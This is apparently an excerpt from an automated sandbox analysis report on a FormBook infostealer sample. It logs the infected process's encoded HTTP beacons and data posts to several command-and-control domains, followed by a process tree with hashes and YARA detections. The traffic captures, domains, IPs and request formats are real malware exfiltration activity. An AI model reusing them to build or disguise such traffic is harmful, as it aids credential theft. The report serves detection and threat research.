46 | 192.168.11.30 | 49867 | 54.67.42.145 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:19.835942030 CEST | 630 | OUT | POST /7cee/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.kx507981.shop
    Cache-Control: max-age=0
    Content-Length: 220
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.kx507981.shop
    Referer: http://www.kx507981.shop/7cee/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
    Data Ascii: nhl=GMdVftKtJN7z55NiCCYsUWFvKDlPx38T7YQhUl0gG5ymo9u7sKXk7JIvQ7xo42gCEEgbkKqpN6JRJLH6PHH+IvFp53U4skGtzpt0sMGKzw5iovV3VfJsppDtw5ppmluHRFeSaPuMOeYUszqxr2qUCt9jW42Rw59CcwAPjln6601hxXugWASaw8wggzC2tq+m/on2oPKMjat02+ZSIuRSgw4=
Oct 9, 2024 13:05:19.990580082 CEST | 296 | IN | HTTP/1.1 301 Moved Permanently
    content-type: text/plain
    date: Wed, 09 Oct 2024 11:05:19 GMT
    content-length: 0
    x-frame-options: SAMEORIGIN
    strict-transport-security: max-age=2592000
    cache-control: no-cache, no-store, must-revalidate
    expires: 631152000000
    location: http://kx507945.shop


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.11.30 | 49868 | 54.67.42.145 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:22.528934002 CEST | 1289 | OUT | POST /7cee/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Host: www.kx507981.shop
    Cache-Control: max-age=0
    Content-Length: 3336
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    Origin: http://www.kx507981.shop
    Referer: http://www.kx507981.shop/7cee/
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
    Data Ascii: nhl=[payload not available]
Oct 9, 2024 13:05:22.528984070 CEST | 2458 | OUT | Data Ascii: UigXOXeB70/HDcS6Zr1aqR+gAp7NPK8978+1lGRTtSVyJ0/tZol/9GapJeqcxQEmllpZizyEn6ops8QnRoEa3hkbAaXcGRJckiZnvSP6JkMXFM+/4Af293639ukt4dO+OG76QTss2jOzBkf+AljB2Jk9WF0GBFj65sa5atHToTGARcJgBYzOFAUoV6Vqxak4C4+3dd6kyRb2iSNGXKkX8B1i5MOYqG6ILmzkBiB872dwC0YVV8x
Oct 9, 2024 13:05:22.683959007 CEST | 296 | IN | HTTP/1.1 301 Moved Permanently
    content-type: text/plain
    date: Wed, 09 Oct 2024 11:05:22 GMT
    content-length: 0
    x-frame-options: SAMEORIGIN
    strict-transport-security: max-age=2592000
    cache-control: no-cache, no-store, must-revalidate
    expires: 631152000000
    location: http://kx507945.shop


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.11.30 | 49869 | 54.67.42.145 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:25.222970009 CEST | 347 | OUT | GET /7cee/?nhl=LO11cYuPDN+V6ulgbSQlbQhpKz952Uhe3dYdUk54a5ewrOC/uvvn5bRLfbUUmCEUWVML7qGOWOxZJM3qSQiiVpBT5y4/s1qW1sM6t7L30BdH3o50b80t3Z0=&9X=EvKH2xeP-DpP307P HTTP/1.1
    Accept: */*
    Accept-Language: en-US,en;q=0.9
    Host: www.kx507981.shop
    Connection: close
    User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:05:25.377521992 CEST | 296 | IN | HTTP/1.1 301 Moved Permanently
    content-type: text/plain
    date: Wed, 09 Oct 2024 11:05:25 GMT
    content-length: 0
    x-frame-options: SAMEORIGIN
    strict-transport-security: max-age=2592000
                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                expires: 631152000000
                                                                                                                                                                location: http://kx507945.shop


Session ID: 49 | Source IP: 192.168.11.30 | Source Port: 49870 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:30.606779099 CEST | 604 | OUT | POST /77wx/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.teerra.shop
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.teerra.shop
Referer: http://www.teerra.shop/77wx/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 32 73 79 61 4b 76 67 51 78 55 33 36 4a 74 4f 4b 62 55 6f 39 66 65 71 4c 43 58 55 4a 59 6b 66 44 53 33 6e 51 77 54 4f 48 6d 6d 4c 35 46 65 36 4b 74 33 57 7a 6e 32 74 33 36 67 37 42 56 50 41 2b 71 6e 6f 6e 41 51 4e 45 4b 56 4d 6e 63 77 6d 74 49 4d 73 6c 47 52 42 35 42 73 7a 78 4b 4c 6f 32 43 4e 37 4d 49 47 45 35 41 31 4f 77 47 78 74 57 35 77 68 33 6b 4f 49 49 67 6c 65 4a 36 71 61 58 69 47 6b 43 62 46 71 59 58 59 4a 42 79 45 6b 61 7a 73 48 50 76 75 4c 59 71 2b 52 70 41 63 66 59 45 6b 36 77 41 78 63 4c 46 49 50 42 73 72 4f 44 5a 59 6d 75 37 4c 36 65 32 30 79 44 6a 36 6a 76 63 67 3d 3d
Data Ascii: nhl=2syaKvgQxU36JtOKbUo9feqLCXUJYkfDS3nQwTOHmmL5Fe6Kt3Wzn2t36g7BVPA+qnonAQNEKVMncwmtIMslGRB5BszxKLo2CN7MIGE5A1OwGxtW5wh3kOIIgleJ6qaXiGkCbFqYXYJByEkazsHPvuLYq+RpAcfYEk6wAxcLFIPBsrODZYmu7L6e20yDj6jvcg==


Session ID: 50 | Source IP: 192.168.11.30 | Source Port: 49871 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:33.247468948 CEST | 624 | OUT | POST /77wx/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.teerra.shop
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.teerra.shop
Referer: http://www.teerra.shop/77wx/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 32 73 79 61 4b 76 67 51 78 55 33 36 4b 4d 65 4b 64 33 41 39 5a 2b 71 4d 48 58 55 4a 53 45 65 49 53 33 37 51 77 53 36 58 6e 56 2f 35 46 36 79 4b 6a 57 57 7a 6b 32 74 33 77 41 37 45 62 76 41 50 71 6d 55 76 41 56 74 45 4b 56 59 6e 63 31 61 74 49 2f 30 6d 48 42 42 37 59 63 7a 2f 45 72 6f 32 43 4e 37 4d 49 47 41 54 41 78 69 77 48 43 6c 57 2f 52 68 30 73 75 49 4c 6e 6c 65 4a 2b 71 62 2f 69 47 6b 73 62 45 6e 33 58 61 42 42 79 47 38 61 7a 35 37 49 32 65 4c 65 6c 65 51 33 4d 65 4f 7a 63 42 6d 46 50 6d 6f 7a 4b 4b 72 2f 74 38 2f 5a 45 62 53 73 6f 72 47 7a 71 31 66 72 68 34 69 30 42 68 54 31 73 76 6f 4f 52 42 4b 4c 65 4d 58 32 69 6f 4b 78 38 68 6b 3d
Data Ascii: nhl=2syaKvgQxU36KMeKd3A9Z+qMHXUJSEeIS37QwS6XnV/5F6yKjWWzk2t3wA7EbvAPqmUvAVtEKVYnc1atI/0mHBB7Ycz/Ero2CN7MIGATAxiwHClW/Rh0suILnleJ+qb/iGksbEn3XaBByG8az57I2eLeleQ3MeOzcBmFPmozKKr/t8/ZEbSsorGzq1frh4i0BhT1svoORBKLeMX2ioKx8hk=


Session ID: 51 | Source IP: 192.168.11.30 | Source Port: 49872 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:35.897790909 CEST | 2578 | OUT | POST /77wx/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.teerra.shop
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.teerra.shop
Referer: http://www.teerra.shop/77wx/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 32 73 79 61 4b 76 67 51 78 55 33 36 4b 4d 65 4b 64 33 41 39 5a 2b 71 4d 48 58 55 4a 53 45 65 49 53 33 37 51 77 53 36 58 6e 55 48 35 46 74 79 4b 6a 31 4f 7a 72 57 74 33 72 41 37 46 62 76 41 53 71 6d 4d 72 41 56 70 79 4b 57 67 6e 64 58 69 74 66 36 41 6d 4d 42 42 37 46 73 7a 79 4b 4c 70 69 43 4e 72 49 49 47 51 54 41 78 69 77 48 44 56 57 2f 41 68 30 75 75 49 49 67 6c 65 46 36 71 62 45 69 47 63 61 62 45 7a 64 58 5a 68 42 7a 78 77 61 7a 50 76 49 32 65 4c 65 74 2b 51 32 4d 65 43 79 63 41 44 4d 50 6a 55 4a 4b 36 50 2f 75 71 32 51 51 71 33 32 38 4b 79 68 76 56 54 33 6f 75 71 2b 4f 78 4b 56 6e 39 6b 33 55 56 69 34 58 61 66 2b 31 4e 53 56 2f 55 54 65 43 70 37 6a 59 68 6c 45 66 6b 4d 6a 4b 44 42 6a 2f 6d 41 7a 41 2f 4f 45 6b 42 56 31 48 62 76 35 68 6d 32 6f 54 63 72 57 6b 6b 72 6d 34 57 43 62 70 48 63 6b 70 4f 70 2b 30 53 6e 77 6a 57 46 47 50 4c 31 51 79 36 58 36 50 6c 35 48 48 68 78 74 37 59 4a 2f 73 6d 5a 5a 37 37 58 35 4a 37 77 4a 51 42 6f 64 4f 78 51 4d 34 32 55 30 51 6e 48 6f 67 33 71 62 64 4f [TRUNCATED]
Data Ascii: nhl=2syaKvgQxU36KMeKd3A9Z+qMHXUJSEeIS37QwS6XnUH5FtyKj1OzrWt3rA7FbvASqmMrAVpyKWgndXitf6AmMBB7FszyKLpiCNrIIGQTAxiwHDVW/Ah0uuIIgleF6qbEiGcabEzdXZhBzxwazPvI2eLet+Q2MeCycADMPjUJK6P/uq2QQq328KyhvVT3ouq+OxKVn9k3UVi4Xaf+1NSV/UTeCp7jYhlEfkMjKDBj/mAzA/OEkBV1Hbv5hm2oTcrWkkrm4WCbpHckpOp+0SnwjWFGPL1Qy6X6Pl5HHhxt7YJ/smZZ77X5J7wJQBodOxQM42U0QnHog3qbdOs8HeYJsRosJ3DbRGRc1xBL/Ja/yGD/2lEtEqcDq0txaml2S8R/hlQAPv0iQsnV/jATqevw7hoBpX2b3ddZ/xx+7NVL+nYwFeq7ULL1G0I1+PHoh8X0tkKHmotnKV5k0zOcu9ZwHEXXi0ucN3tEVG8NAUo3aqYLBK+aCkqYVPRh+tHtRHEJOq3PqDBI8sZlnlfHj6ylEmryEtjvuFjG0h+QEpKPZQtubC1BkUNsqEbNkXLCrb+JZGfSJynQsF43VNL/LELWgAGgOfs+fhwURCoOst3Bqv2LtJeMchw+flYf3khtm2bpP5Hkkq9n06bHQavGgvHt1vtMWbewDcY2vTO2KZsqQ73LTiLL4wSa85agp8sJQo8CtJXR0A/lZtUnDwF0lUaBOmj2Ke6+qYEtEbQZM0DmdFSbTMaCpxfNrBiEiOdXVNNh5udPlQjMyMqtqUZwxp9xkny3U5aRrRrZSxwsQQe8Vcg4pfMWeh5dB/rhsKwGM390GFQx8j0tX1JqhHQ8Vhp6IB7Ta3xsosHfriU4vnsmARZWbxA4Qbccj9y9y7gV25NEO3TcFmCVvZ7tCfGSsdSHKG+5L7imWevNOgso3u85D4arig3hj54Phj+FfiN8PlPQiJvfZgPozKF3TnGFE5TVolRWZSOf2G3iQPqC/E+mxADay8+s [TRUNCATED]
Oct 9, 2024 13:05:35.897815943 CEST | 1163 | OUT | Data Raw: 63 4b 4a 76 6f 42 68 62 2b 39 6e 64 66 49 6e 65 48 51 74 4e 76 50 73 71 6e 69 33 62 4c 6c 63 79 4a 56 6c 71 39 76 53 62 65 63 32 73 6c 73 36 64 68 6c 6e 33 32 4d 48 5a 36 54 78 46 45 61 41 32 76 4a 49 77 6f 79 53 2f 4c 79 37 6e 55 39 48 68 46 6b
Data Ascii: cKJvoBhb+9ndfIneHQtNvPsqni3bLlcyJVlq9vSbec2sls6dhln32MHZ6TxFEaA2vJIwoyS/Ly7nU9HhFkcbmXcQGRQnEN7LGSr5YSOOcleWzYYImrCYjBrqDE89BiLFOp5p6ZfYtUDBkhfqzM/QVYQceFJz/92/LzWQ7wMj205Krxcs9tjzvoieyM5zkOm20rn6b+DqhY1F4DF1IFtDg6YObJOw+NzAQ1zHcWmB4iruCUPuXij


Session ID: 52 | Source IP: 192.168.11.30 | Source Port: 49873 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:05:38.525166035 CEST | 345 | OUT | GET /77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.teerra.shop
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:05:45.583575010 CEST | 399 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 09 Oct 2024 11:05:45 GMT
Content-Type: text/html
Content-Length: 259
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 68 6c 3d 37 75 61 36 4a 62 46 6c 68 31 57 4c 4a 6f 61 6f 4e 6c 41 73 52 66 75 49 46 32 73 54 4a 46 36 4c 63 54 58 62 2b 7a 79 48 70 32 53 56 52 74 53 64 31 79 6d 33 70 6d 31 4a 38 79 43 44 56 62 30 30 30 30 55 76 56 77 35 67 53 54 49 2f 56 67 69 2f 66 61 55 68 4d 67 55 64 48 76 72 63 50 72 6c 71 41 71 62 72 4f 52 64 78 59 69 47 4a 52 6e 39 38 31 43 6c 4f 7a 4d 34 3d 26 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P"}</script></head></html>


Session ID: 53 | Source IP: 192.168.11.30 | Source Port: 49878 | Destination IP: 84.32.84.32 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:06:05.253164053 CEST | 616 | OUT | POST /51t8/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.agilizeimob.app
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.agilizeimob.app
Referer: http://www.agilizeimob.app/51t8/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 72 35 70 56 37 55 65 73 33 4e 58 75 69 57 43 56 4b 79 4d 62 4e 78 34 2f 5a 4c 69 67 41 52 4f 38 51 63 6f 34 6d 43 35 56 34 6a 43 38 61 70 36 44 45 6d 72 6d 4b 6c 62 69 61 53 70 6f 61 62 76 36 4f 52 38 62 76 49 50 67 31 56 70 59 33 6b 71 55 6b 4d 31 33 4b 47 6e 6d 59 5a 53 75 36 64 34 52 63 39 2b 57 6a 4d 79 4d 4d 4e 31 72 53 53 63 46 44 6c 53 72 56 69 66 36 4f 6b 64 65 51 4f 51 6e 39 6c 43 45 47 48 6f 35 43 6e 59 57 54 49 6c 79 79 7a 2b 32 38 59 55 71 57 6d 65 51 49 75 61 52 30 68 39 67 69 6b 65 32 54 79 75 68 34 4c 33 4f 62 48 55 71 6e 70 39 7a 63 58 41 6a 47 56 2b 37 70 41 3d 3d
Data Ascii: nhl=r5pV7Ues3NXuiWCVKyMbNx4/ZLigARO8Qco4mC5V4jC8ap6DEmrmKlbiaSpoabv6OR8bvIPg1VpY3kqUkM13KGnmYZSu6d4Rc9+WjMyMMN1rSScFDlSrVif6OkdeQOQn9lCEGHo5CnYWTIlyyz+28YUqWmeQIuaR0h9gike2Tyuh4L3ObHUqnp9zcXAjGV+7pA==


Session ID: 54 | Source IP: 192.168.11.30 | Source Port: 49879 | Destination IP: 84.32.84.32 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:06:07.898647070 CEST | 636 | OUT | POST /51t8/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.agilizeimob.app
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.agilizeimob.app
Referer: http://www.agilizeimob.app/51t8/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 72 35 70 56 37 55 65 73 33 4e 58 75 67 7a 4b 56 5a 46 34 62 64 68 34 77 56 72 69 67 4b 78 4f 77 51 63 6b 34 6d 44 4e 46 34 52 6d 38 62 4a 71 44 4c 44 48 6d 4e 6c 62 69 43 43 70 30 55 37 75 32 4f 52 67 54 76 4b 4c 67 31 56 74 59 33 6c 61 55 6b 2f 64 77 4c 57 6e 67 45 5a 53 67 30 39 34 52 63 39 2b 57 6a 4d 4f 6d 4d 4e 64 72 52 6a 73 46 44 42 47 30 66 43 66 37 59 55 64 65 61 75 51 6a 39 6c 43 6d 47 47 31 78 43 6a 6f 57 54 4e 42 79 7a 68 47 70 7a 59 55 6f 53 6d 66 77 45 4d 2f 44 79 43 64 70 74 31 36 32 52 42 53 6f 77 38 47 55 47 45 67 6f 30 4a 42 65 41 57 74 4c 45 58 2f 67 30 42 4a 73 4e 2f 34 6b 78 35 62 61 56 6c 46 46 6a 61 65 70 76 59 41 3d
Data Ascii: nhl=r5pV7Ues3NXugzKVZF4bdh4wVrigKxOwQck4mDNF4Rm8bJqDLDHmNlbiCCp0U7u2ORgTvKLg1VtY3laUk/dwLWngEZSg094Rc9+WjMOmMNdrRjsFDBG0fCf7YUdeauQj9lCmGG1xCjoWTNByzhGpzYUoSmfwEM/DyCdpt162RBSow8GUGEgo0JBeAWtLEX/g0BJsN/4kx5baVlFFjaepvYA=


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.11.30 | 49880 | 84.32.84.32 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:06:10.537930965 CEST | 2578 | OUT | POST /51t8/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.agilizeimob.app
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.agilizeimob.app
Referer: http://www.agilizeimob.app/51t8/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:06:10.537978888 CEST | 1175 | OUT | Data Ascii: CkZwVwREf9UkSkgXY+hXmBDJ7QFAGkuWlQdnHUxhJsi6cfynfX4eeEeYbju+YhYKwnGfAm95op0hktzqaB7tPa0llkmemzOGLtpA/hejV3Qe4y7kgqeSZmV+5kvZ3KZ6K/ZjymEP2rTHYoYw+9IUpYQh1XGUWVWJcfEVQwQN9bNtvlyCNtcl8+YXD2bn96RMTKTxHgyNEVYPO4wtV84Jy0nxNL/pJPCoryZGTPbzV5fLvgSLXWH


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.11.30 | 49881 | 84.32.84.32 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:06:13.173218966 CEST | 349 | OUT | GET /51t8/?nhl=m7B14gWZ3tTp+Si7ZmYNMzAQVPiIRhKeZLAtkzFkwSvyWpqHTy62LwfcTz9vRoaiRTwb/KbEqTho7SSr6qx+JXj6A7Si0P86LNCZt8nEBft2KH0FBAqzAzY=&9X=EvKH2xeP-DpP307P HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.agilizeimob.app
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:06:13.273905993 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: hcdn
Date: Wed, 09 Oct 2024 11:06:13 GMT
Content-Type: text/html
Content-Length: 10072
Connection: close
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: 2f359f3381bea2ee18e0d521e662e1fd-bos-edge3
Expires: Wed, 09 Oct 2024 11:06:12 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.11.30 | 49882 | 85.159.66.93 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:06:21.594422102 CEST | 347 | OUT | GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.sealofsea.xyz
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:07:21.807486057 CEST | 194 | IN | HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html
Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


Target ID: 0
Start time: 06:58:15
Start date: 09/10/2024
Path: C:\Users\user\Desktop\8EhMjL3yNF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\8EhMjL3yNF.exe"
Imagebase: 0x400000
File size: 1'336'099 bytes
MD5 hash: ADF7951566B1BB643B3FC555987CBDDC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:58:19
Start date: 09/10/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\8EhMjL3yNF.exe"
Imagebase: 0xe10000
File size: 47'016 bytes
MD5 hash: B7C999040D80E5BF87886D70D992C51E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705383176691.0000000006730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705376707747.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705378813444.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.705378813444.0000000004390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: moderate
Has exited: true

Target ID: 4
Start time: 07:01:17
Start date: 09/10/2024
Path: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe"
Imagebase: 0xd10000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.708578550328.0000000003FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.708578550328.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:07:01:19
                                                                                                                                                                Start date:09/10/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\choice.exe"
                                                                                                                                                                Imagebase:0xb30000
                                                                                                                                                                File size:28'160 bytes
                                                                                                                                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.708574335375.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.708579283397.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
